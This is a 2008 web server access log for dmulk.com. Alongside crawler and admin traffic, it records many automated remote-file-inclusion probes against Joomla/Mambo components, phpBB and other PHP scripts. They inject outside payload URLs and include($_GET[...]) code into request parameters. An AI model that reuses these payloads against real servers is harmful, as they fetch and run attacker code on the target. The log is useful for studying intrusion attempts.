68.8.254.30 - warboard [22/Sep/2008:11:16:07 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 33104 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:11:16:08 -0700] "GET /logs/access_080831.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=link%20uploadan%20on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.103 - - [22/Sep/2008:11:16:09 -0700] "GET /blog/wp-content/uploads/2008/ HTTP/1.0" 200 840 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
74.6.18.225 - - [22/Sep/2008:11:16:14 -0700] "GET /bikes/dteel/2008_09_13/ HTTP/1.0" 200 1678 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.160.79.6 - - [22/Sep/2008:11:16:25 -0700] "GET /logs/access_080512.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.16 - - [22/Sep/2008:11:16:25 -0700] "GET /logs/access_080512.log///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.16 - - [22/Sep/2008:11:16:27 -0700] "GET ///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 200 3711 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.87.84 - - [22/Sep/2008:11:16:27 -0700] "GET /logs/access_080325.log//index.php?option=com_performs&formid=&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.16 - - [22/Sep/2008:11:16:27 -0700] "GET /logs///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.87.84 - - [22/Sep/2008:11:16:28 -0700] "GET //index.php?option=com_performs&formid=&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 200 95210 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.16.30 - - [22/Sep/2008:11:16:29 -0700] "GET /logs/access_080615.log//index.php?option=com_akolegal&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:11:16:29 -0700] "GET /logs/access_080831.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=link%20uploadan%20on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.87.84 - - [22/Sep/2008:11:16:29 -0700] "GET /logs//index.php?option=com_performs&formid=&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.16.30 - - [22/Sep/2008:11:16:31 -0700] "GET //index.php?option=com_akolegal&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 200 95143 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.16.30 - - [22/Sep/2008:11:16:31 -0700] "GET /logs//index.php?option=com_akolegal&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.16 - - [22/Sep/2008:11:16:32 -0700] "GET /logs/access_080502.log///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.8.254.30 - warboard [22/Sep/2008:11:16:33 -0700] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=674 HTTP/1.1" 200 7580 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:11:16:36 -0700] "GET /logs/access_080714.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=link%20uploadan%20on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.103.142.90 - - [22/Sep/2008:11:16:44 -0700] "GET /logs/index.php?Language=http://pwcomm.iquebec.com/reponse.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.103.142.90 - - [22/Sep/2008:11:16:44 -0700] "GET /logs/access_080503.log/index.php?Language=http://pwcomm.iquebec.com/reponse.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.103.142.90 - - [22/Sep/2008:11:16:45 -0700] "GET /index.php?Language=http://pwcomm.iquebec.com/reponse.txt??? HTTP/1.1" 200 94732 "-" "libwww-perl/5.805" "www.dmulk.com"
84.246.7.59 - - [22/Sep/2008:11:16:52 -0700] "GET /logs/access_080327.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
84.246.7.59 - - [22/Sep/2008:11:16:52 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
84.246.7.59 - - [22/Sep/2008:11:16:53 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.113.250.220 - - [22/Sep/2008:11:16:55 -0700] "GET /logs/access_080520.log//index.php?option=com_akogallery&func=detail&id=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.8.254.30 - warboard [22/Sep/2008:11:16:55 -0700] "POST /warboard/index.php?table_name=warboard_main&page=0&function=update&where_field=dataid&where_value=674 HTTP/1.1" 302 2906 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=674" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
68.8.254.30 - warboard [22/Sep/2008:11:16:56 -0700] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=674&just_updated=1 HTTP/1.1" 200 7614 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=674" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
85.113.250.220 - - [22/Sep/2008:11:16:57 -0700] "GET //index.php?option=com_akogallery&func=detail&id=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 200 95212 "-" "libwww-perl/5.805" "www.dmulk.com"
68.8.254.30 - warboard [22/Sep/2008:11:16:57 -0700] "GET /warboard/index.php?table_name=warboard_main HTTP/1.1" 200 32998 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=674&just_updated=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
85.113.250.220 - - [22/Sep/2008:11:16:58 -0700] "GET /logs//index.php?option=com_akogallery&func=detail&id=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.87.145 - - [22/Sep/2008:11:17:01 -0700] "GET /logs//citywriter/head.php?path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.87.145 - - [22/Sep/2008:11:17:02 -0700] "GET //citywriter/head.php?path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.87.84 - - [22/Sep/2008:11:17:03 -0700] "GET /logs/access_080310.log//index.php?option=com_performs&formid=&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.8.254.30 - warboard [22/Sep/2008:11:17:04 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC HTTP/1.1" 200 32931 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
211.160.79.6 - - [22/Sep/2008:11:17:04 -0700] "GET /logs/access_080512.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.211.210 - - [22/Sep/2008:11:17:05 -0700] "GET /logs/access_080512.log//index.php?option=com_letterman&task=view&Itemid=&id=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.8.254.30 - warboard [22/Sep/2008:11:17:06 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 33106 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
213.203.211.210 - - [22/Sep/2008:11:17:07 -0700] "GET //index.php?option=com_letterman&task=view&Itemid=&id=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 200 95277 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.211.210 - - [22/Sep/2008:11:17:08 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&id=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.192.82.221 - - [22/Sep/2008:11:17:14 -0700] "GET /logs/access_080513.log//index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
12.192.82.221 - - [22/Sep/2008:11:17:15 -0700] "GET //index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 200 95161 "-" "libwww-perl/5.79" "www.dmulk.com"
12.192.82.221 - - [22/Sep/2008:11:17:15 -0700] "GET /logs//index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.103.142.90 - - [22/Sep/2008:11:17:16 -0700] "GET /logs/access_080510.log/index.php?Language=http://pwcomm.iquebec.com/reponse.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.116.1.202 - - [22/Sep/2008:11:17:20 -0700] "GET /logs/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [22/Sep/2008:11:17:20 -0700] "GET /logs/access_080808.log/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [22/Sep/2008:11:17:20 -0700] "GET /plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [22/Sep/2008:11:17:21 -0700] "GET /logs/access_080827.log/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.253.223.90 - - [22/Sep/2008:11:17:27 -0700] "GET /logs/access_080712.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [22/Sep/2008:11:17:29 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 200 95149 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [22/Sep/2008:11:17:30 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.213.30 - - [22/Sep/2008:11:17:31 -0700] "GET /minamijewelry/html/images/jewelry/B5t.jpg HTTP/1.0" 200 3859 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.30 - - [22/Sep/2008:11:17:31 -0700] "GET /minamijewelry/html/images/jewelry/B2.jpg HTTP/1.0" 200 55806 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.30 - - [22/Sep/2008:11:17:32 -0700] "GET /minamijewelry/html/images/jewelry/B4.jpg HTTP/1.0" 200 53145 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.30 - - [22/Sep/2008:11:17:33 -0700] "GET /minamijewelry/html/images/jewelry/B1.jpg HTTP/1.0" 200 57683 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.30 - - [22/Sep/2008:11:17:35 -0700] "GET /minamijewelry/html/images/main.jpg HTTP/1.0" 200 19269 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.30 - - [22/Sep/2008:11:17:35 -0700] "GET /minamijewelry/html/images/jewelry/B3t.jpg HTTP/1.0" 200 2904 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.30 - - [22/Sep/2008:11:17:36 -0700] "GET /minamijewelry/html/images/bird_lg.jpg HTTP/1.0" 200 2607 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.30 - - [22/Sep/2008:11:17:36 -0700] "GET /minamijewelry/html/images/jewelry/B1t.jpg HTTP/1.0" 200 2616 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.30 - - [22/Sep/2008:11:17:36 -0700] "GET /minamijewelry/html/images/minami_jewelry_lg.jpg HTTP/1.0" 200 4890 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
195.5.163.212 - - [22/Sep/2008:11:17:37 -0700] "GET //claroline/tracking/userLog.php?rootSys=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.253.223.90 - - [22/Sep/2008:11:17:42 -0700] "GET /logs/access_080828.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.243.113 - - [22/Sep/2008:11:17:50 -0700] "GET /logs/access_080327.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.243.113 - - [22/Sep/2008:11:17:50 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.243.113 - - [22/Sep/2008:11:17:50 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.8.254.30 - warboard [22/Sep/2008:11:17:51 -0700] "GET /warboard/index.php?function=show_insert_form&table_name=warboard_main HTTP/1.1" 200 7348 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
83.231.138.99 - - [22/Sep/2008:11:17:57 -0700] "GET /logs/access_080118.log//index.php?option=com_mp3player&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.231.138.99 - - [22/Sep/2008:11:17:58 -0700] "GET //index.php?option=com_mp3player&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 200 95149 "-" "libwww-perl/5.65" "www.dmulk.com"
83.231.138.99 - - [22/Sep/2008:11:17:59 -0700] "GET /logs//index.php?option=com_mp3player&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.231.138.99 - - [22/Sep/2008:11:17:59 -0700] "GET /logs/access_080630.log//index.php?option=com_mp3player&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:11:18:08 -0700] "GET /logs/access_080831.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=link%20uploadan%20on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:11:18:08 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:11:18:09 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
202.181.243.113 - - [22/Sep/2008:11:18:16 -0700] "GET /logs/access_080407.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:11:18:21 -0700] "GET /logs/access_080714.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=link%20uploadan%20on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.67.119 - - [22/Sep/2008:11:18:27 -0700] "GET /logs/access_080901.log//components/com_flyspray/startdown.php?file=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
84.246.7.59 - - [22/Sep/2008:11:18:42 -0700] "GET /logs/access_080906.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.41.145.41 - - [22/Sep/2008:11:18:45 -0700] "GET /blog/ HTTP/1.0" 200 94306 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "dmulk.com"
64.41.145.32 - - [22/Sep/2008:11:18:50 -0700] "GET /blog/index.php/feed/ HTTP/1.0" 200 9529 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "dmulk.com"
74.6.18.225 - - [22/Sep/2008:11:18:56 -0700] "GET /bikes/dteel/CreSTOC08/ HTTP/1.0" 200 6009 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
84.246.7.59 - - [22/Sep/2008:11:18:56 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
84.246.7.59 - - [22/Sep/2008:11:18:56 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.208 - - [22/Sep/2008:11:19:07 -0700] "GET /logs/access_080824.log//lib/armygame.php?libpath=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.208 - - [22/Sep/2008:11:19:07 -0700] "GET /logs/access_080820.log//lib/armygame.php?libpath=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
12.192.82.221 - - [22/Sep/2008:11:19:14 -0700] "GET /logs/access_080423.log//index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:11:19:26 -0700] "GET /logs/access_070910.log HTTP/1.0" 200 50863 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
84.246.7.59 - - [22/Sep/2008:11:19:48 -0700] "GET /logs/access_080407.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:11:19:49 -0700] "GET /bikes/dteel/CreSTOC08/?M=A HTTP/1.0" 200 6009 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.15.159.85 - - [22/Sep/2008:11:20:05 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://oursoultvxq.com/bbs/data/bbs/ideex.txt?? HTTP/1.1" 200 3711 "-" "libwww-perl/5.813" "www.dmulk.com"
68.8.254.30 - warboard [22/Sep/2008:11:20:21 -0700] "POST /warboard/index.php?table_name=warboard_main&page=0&function=insert HTTP/1.1" 302 2906 "http://www.dmulk.com/warboard/index.php?function=show_insert_form&table_name=warboard_main" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
68.8.254.30 - warboard [22/Sep/2008:11:20:22 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&just_inserted=1&order=dataid&order_type=desc HTTP/1.1" 200 33021 "http://www.dmulk.com/warboard/index.php?function=show_insert_form&table_name=warboard_main" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
72.9.238.98 - - [22/Sep/2008:11:20:27 -0700] "GET /logs/access_080327.log//index.php?option=com_mtree&task=listcats&cat_id=&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
68.8.254.30 - warboard [22/Sep/2008:11:20:27 -0700] "GET /warboard/index.php?table_name=warboard_main&function=delete&where_clause=&page=0&order=dataid&order_type=desc&where_field=dataid&where_value=4854 HTTP/1.1" 302 2906 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&just_inserted=1&order=dataid&order_type=desc" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
68.8.254.30 - warboard [22/Sep/2008:11:20:28 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=dataid&order_type=desc HTTP/1.1" 200 33055 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&just_inserted=1&order=dataid&order_type=desc" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
83.222.27.201 - - [22/Sep/2008:11:20:32 -0700] "GET /logs/access_080702.log/phpSecurePages/secure.php?&cfgProgDir=http://ultima-web.info/ecrire/win_width.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.222.27.201 - - [22/Sep/2008:11:20:34 -0700] "GET /phpSecurePages/secure.php?&cfgProgDir=http://ultima-web.info/ecrire/win_width.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.9.238.98 - - [22/Sep/2008:11:20:35 -0700] "GET //index.php?option=com_mtree&task=listcats&cat_id=&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 200 95301 "-" "libwww-perl/5.812" "www.dmulk.com"
83.222.27.201 - - [22/Sep/2008:11:20:37 -0700] "GET /logs/access_080702.log/phpSecurePages/secure.php?&cfgProgDir=http://ultima-web.info/ecrire/win_width.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.27.201 - - [22/Sep/2008:11:20:37 -0700] "GET /phpSecurePages/secure.php?&cfgProgDir=http://ultima-web.info/ecrire/win_width.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.27.201 - - [22/Sep/2008:11:20:38 -0700] "GET /logs/phpSecurePages/secure.php?&cfgProgDir=http://ultima-web.info/ecrire/win_width.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.238.98 - - [22/Sep/2008:11:20:44 -0700] "GET /logs//index.php?option=com_mtree&task=listcats&cat_id=&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:11:20:47 -0700] "GET /bikes/dteel/CreSTOC08/?N=D HTTP/1.0" 200 6009 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.113.250.220 - - [22/Sep/2008:11:20:58 -0700] "GET /logs/access_080520.log//index.php?option=com_akogallery&func=detail&id=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
